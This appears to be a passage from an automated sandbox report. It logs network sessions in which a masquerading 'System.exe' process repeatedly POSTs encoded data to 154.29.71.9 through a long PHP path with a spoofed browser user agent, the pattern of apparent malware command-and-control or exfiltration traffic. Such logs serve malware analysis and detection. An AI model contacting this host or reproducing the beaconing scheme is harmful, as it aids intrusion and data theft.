                                                                                                    Jan 4, 2025 14:52:31.244667053 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:31.598114967 CET2600OUTData Raw: 5c 5d 58 5a 5b 55 5d 51 5b 59 5a 55 50 50 5b 52 56 55 54 48 52 51 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]XZ[U]Q[YZUPP[RVUTHRQR_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;>%.T> ?('+$83*5=<":*. 238:?"Y ']/
                                                                                                    Jan 4, 2025 14:52:31.761879921 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:31.890424967 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.449757154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:32.067415953 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:32.426287889 CET2600OUTData Raw: 59 58 5d 5d 5b 54 5d 51 5b 59 5a 55 50 5b 5b 5a 56 56 54 46 52 5c 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YX]][T]Q[YZUP[[ZVVTFR\RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,-5&.=.<(>,$8Y8= =3P6(=.$@1#4Y-/"Y ']/(
                                                                                                    Jan 4, 2025 14:52:32.747458935 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:32.879081011 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.449758154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:33.360832930 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:33.707468033 CET2600OUTData Raw: 59 58 5d 5b 5e 5f 5d 51 5b 59 5a 55 50 5a 5b 54 56 53 54 43 52 50 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YX][^_]Q[YZUPZ[TVSTCRPR_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X8>*&8.*=8^<.7$+;,3%5W!(T)X8@&,Y.?"Y ']/,
                                                                                                    Jan 4, 2025 14:52:33.877618074 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:34.006124020 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.449759154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:34.140182018 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:34.488822937 CET2600OUTData Raw: 5c 59 5d 5b 5b 5e 5d 51 5b 59 5a 55 50 5d 5b 54 56 50 54 43 52 50 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Y][[^]Q[YZUP][TVPTCRPRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y8=!^2&T>-Y)>$'$,#W!./P"+**.@1X."Y ']/0
                                                                                                    Jan 4, 2025 14:52:34.697588921 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:34.826133966 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.449760154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:34.967447042 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.449761154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:35.215934038 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:35.568012953 CET1856OUTData Raw: 59 58 58 59 5b 5f 5d 56 5b 59 5a 55 50 51 5b 56 56 5c 54 46 52 59 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXXY[_]V[YZUPQ[VV\TFRYR_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:..-[%(%>++,38;/1","8)U)-#% /?"Y ']/
                                                                                                    Jan 4, 2025 14:52:35.783101082 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:35.921016932 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 10 32 29 26 55 25 13 0e 54 3a 5a 3d 14 3f 30 32 44 2c 3d 2f 04 2b 04 02 06 2f 33 27 59 3f 3b 29 1b 29 21 3f 19 31 01 2b 05 2a 36 20 51 03 12 27 13 32 07 08 59 3d 30 31 5a 39 2e 30 41 20 32 34 00 31 04 32 59 20 3e 39 5c 25 01 21 57 2a 2f 03 56 2c 3e 28 03 2d 55 2c 1d 3f 05 23 55 0b 1f 26 0b 25 31 12 52 27 3b 2b 00 29 30 16 5a 2b 3a 2f 1d 37 3a 30 10 26 58 21 03 33 32 3d 12 24 1f 04 04 30 1d 0f 19 21 3d 20 05 25 3a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"2)&U%T:Z=?02D,=/+/3'Y?;))!?1+*6 Q'2Y=01Z9.0A 2412Y >9\%!W*/V,>(-U,?#U&%1R';+)0Z+:/7:0&X!32=$0!= %:.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.449762154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:35.347524881 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:35.694494963 CET2600OUTData Raw: 59 59 58 5c 5b 5c 58 55 5b 59 5a 55 50 5f 5b 54 56 51 54 42 52 5a 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YYX\[\XU[YZUP_[TVQTBRZRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,-9%8U?=;(4$;0Z;#*6[##;>*X7%3-?"Y ']/
                                                                                                    Jan 4, 2025 14:52:35.899853945 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:36.030916929 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.449763154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:36.176345110 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:36.535666943 CET2600OUTData Raw: 5c 5a 58 5b 5b 59 58 57 5b 59 5a 55 50 5a 5b 56 56 56 54 40 52 5e 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZX[[YXW[YZUPZ[VVVT@R^R^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z89X&:P?-(<=S0( ,U:6?Q#(6*-8D13$//"Y ']/,
                                                                                                    Jan 4, 2025 14:52:36.795264959 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:36.957587004 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.449764154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:37.089591980 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:37.441951990 CET2600OUTData Raw: 5c 5a 58 58 5e 59 58 50 5b 59 5a 55 50 5f 5b 56 56 56 54 42 52 58 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXX^YXP[YZUP_[VVVTBRXR^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:89&"P?.$_([/T';0[.#9">;6(9U(.1 :"Y ']/
                                                                                                    Jan 4, 2025 14:52:37.623141050 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:37.752001047 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.449765154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:38.051203966 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:38.411748886 CET2600OUTData Raw: 5c 5a 58 5e 5b 58 58 5c 5b 59 5a 55 50 5a 5b 54 56 56 54 40 52 5b 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZX^[XX\[YZUPZ[TVVT@R[RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_/>:$8!=[(?8$0/26=?P!+5V='13(:?"Y ']/,
                                                                                                    Jan 4, 2025 14:52:38.586404085 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:38.717899084 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.449766154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:38.866938114 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:39.223089933 CET2600OUTData Raw: 59 5f 58 5c 5b 59 58 5c 5b 59 5a 55 50 5b 5b 53 56 5d 54 49 52 5c 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y_X\[YX\[YZUP[[SV]TIR\R\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z/-*1.P=?%;+, 9"[/T"=W(>8E&U+./"Y ']/(
                                                                                                    Jan 4, 2025 14:52:39.384315968 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:39.518296957 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.449767154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:39.664438963 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:40.020354986 CET2600OUTData Raw: 5c 5a 58 5b 5b 59 58 56 5b 59 5a 55 50 5d 5b 56 56 57 54 47 52 5d 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZX[[YXV[YZUP][VVWTGR]RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/..&^&V=[4^?[3$(;,*Q -58=&0(X:/"Y ']/0
                                                                                                    Jan 4, 2025 14:52:40.181425095 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:40.314207077 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    27192.168.2.449768154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:40.448903084 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:40.801292896 CET2596OUTData Raw: 59 5c 58 5b 5e 5b 5d 50 5b 59 5a 55 50 58 5b 54 56 56 54 40 52 5e 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\X[^[]P[YZUPX[TVVT@R^RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;>&1(>[$_+ %+,2"./5%U(.23$[:/"Y ']/


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    28192.168.2.449769154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
